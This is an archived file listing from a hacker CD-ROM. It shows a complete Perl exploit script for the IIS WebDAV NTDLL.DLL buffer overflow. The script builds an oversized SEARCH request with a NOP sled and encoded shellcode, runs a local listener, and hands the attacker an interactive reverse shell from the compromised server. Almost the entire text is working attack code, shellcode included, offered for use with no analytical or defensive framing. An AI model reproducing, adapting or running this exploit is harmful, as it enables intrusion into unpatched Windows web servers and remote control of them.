H4CK3R 15

home *** CD-ROM | disk | FTP | other *** search

/ H4CK3R 15 / hacker15 / 15_H4CK3R#15.ISO / eploits / webdav / webdav_ex.pl < prev

Wrap

Perl Script | 2004-03-03 | 7.2 KB | 265 lines

#!/usr/bin/perl ############### ## # webdav_ex.pl - hdm@digitaloffense.net ## use strict; use POSIX; use IO::Socket; use IO::Select; use Getopt::Std; sub Usage { my ($targets) = @_; print STDERR "\n webdav_ex.pl - IIS WebDAV NTDLL.DLL Exploit\n"; print STDERR "======================================================\n\n"; print STDERR " Usage: $0 -h <target> -p <port> -H <listener ip> -P <listen port> -R <ret address>\n\n"; exit(1); } my %args; getopt('h:p:H:P:R:', \%args); if (! $args{h} || ! $args{H}) { Usage(); } my $target_host = $args{h}; my $local_host = $args{H}; my $local_port = $args{P} || 4444; my $target_port = $args{p} || 80; my $target_ret = $args{R} || "cc01"; my $listen_pid = StartListener($local_port); my $shellcode; my $rsocket; my $request; $target_ret = eval("0x" . $target_ret) + 0; if (! $target_ret) { print STDERR "[*] Error: return address must be in form XXYY\n"; exit(0); } $target_ret = reverse(pack("s", $target_ret)); printf ("[*] Using return address 0x00%.2x00%.2x\n", ord(substr($target_ret, 0, 1)), ord(substr($target_ret, 1, 1))); $SIG{USR2} = \&GoAway; while(<DATA>){ $shellcode .= $_ } $shellcode = eval($shellcode); my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($local_host)); $a1 = chr(ord($a1) ^ 0x93); $a2 = chr(ord($a2) ^ 0x93); $a3 = chr(ord($a3) ^ 0x93); $a4 = chr(ord($a4) ^ 0x93); substr($shellcode, 335, 4, $a1 . $a2 . $a3 . $a4); my ($p1, $p2) = split(//, reverse(pack("s", $local_port))); $p1 = chr(ord($p1) ^ 0x93); $p2 = chr(ord($p2) ^ 0x93); substr($shellcode, 330, 2, $p1 . $p2); select(STDOUT); $|++; print "[*] Shellcode size is " . length($shellcode) . " bytes\n"; $request = BuildExploit($target_host, $target_port, $target_ret, $shellcode); print "[*] Exploit request is " . length($request) . " bytes\n"; AttemptExploit($target_host, $target_port, $request); kill("USR2", $listen_pid); exit(0); sub BuildExploit { my ($host, $port, $ret, $scode) = @_; my ($request, $content); my $res; my $srv; my $url; $url .= "A" x 2000; $url .= ($target_ret x 500); $url .= ("\x90\x90" x 13884); $url .= ("\x90" x (2000 - length($shellcode))); $url .= $shellcode; $request = "SEARCH /" . $url ." HTTP/1.1\r\n"; $request .= "Host: $target_host:$target_port\r\n"; $request .= "Content-Type: text/xml\r\n"; $content .= "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n"; $content .= "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"; # how easy can we make this... $content .= ("\x90" x 32000) . $scode; $request .= "Content-Length: " . length($content) . "\r\n"; $request .= "\r\n$content"; return $request; } sub AttemptExploit { my ($host, $port, $request) = @_; my $s = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => $port, Type => SOCK_STREAM ); if (! $s) { print "[*] Error, could not connect to $host:$port.\n"; kill("USR2", $listen_pid); exit(0); } print "[*] Sending " .length($request) . " bytes to remote host.\n"; print $s $request; print "[*] Waiting for shell to spawn.\n"; sleep(1); return(0); } sub StartListener { my ($local_port) = @_; my $listen_pid = $$; my $s = IO::Socket::INET->new ( Proto => "tcp", LocalPort => $local_port, Type => SOCK_STREAM, Listen => 3 ); if (! $s) { print "[*] Could not start listener: $!\n"; exit(0); } print "[*] Listener started on port $local_port\n"; my $exploit_pid = fork(); if ($exploit_pid) { my $victim; $SIG{USR2} = \&GoAway; while ($victim = $s->accept()) { kill("USR2", $exploit_pid); print STDOUT "[*] Starting shell...\n\n"; StartShell($victim); } exit(0); } return ($listen_pid); } sub StartShell { my ($client) = @_; my $sel = IO::Select->new(); Unblock(*STDIN); Unblock(*STDOUT); Unblock($client); select($client); $|++; select(STDIN); $|++; select(STDOUT); $|++; $sel->add($client); $sel->add(*STDIN); print $client "ipconfig\n"; while (fileno($client)) { my $fd; my @fds = $sel->can_read(0.2); foreach $fd (@fds) { my @in = <$fd>; if(! scalar(@in)) { next; } if (! $fd || ! $client) { print "[*] Closing connection.\n"; close($client); exit(0); } if ($fd eq $client) { print STDOUT join("", @in); } else { print $client join("", @in); } } } close ($client); } sub Unblock { my $fd = shift; my $flags; $flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n"; fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n"; } sub GoAway { exit(0); } # shellcode by hsj <hsj@shadowpenguin.org> __DATA__ $shellcode = "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01". "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30". "\x93\x40\xe2\xfa". "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1". "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2". "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93". "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7". "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0". "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8". "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93". "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93". "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0". "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87". "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60". "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5". "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90". "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22". "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18". "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92". "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3". "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93". "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9". "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18". "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce". "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6". "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7". "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4". "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca". "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50";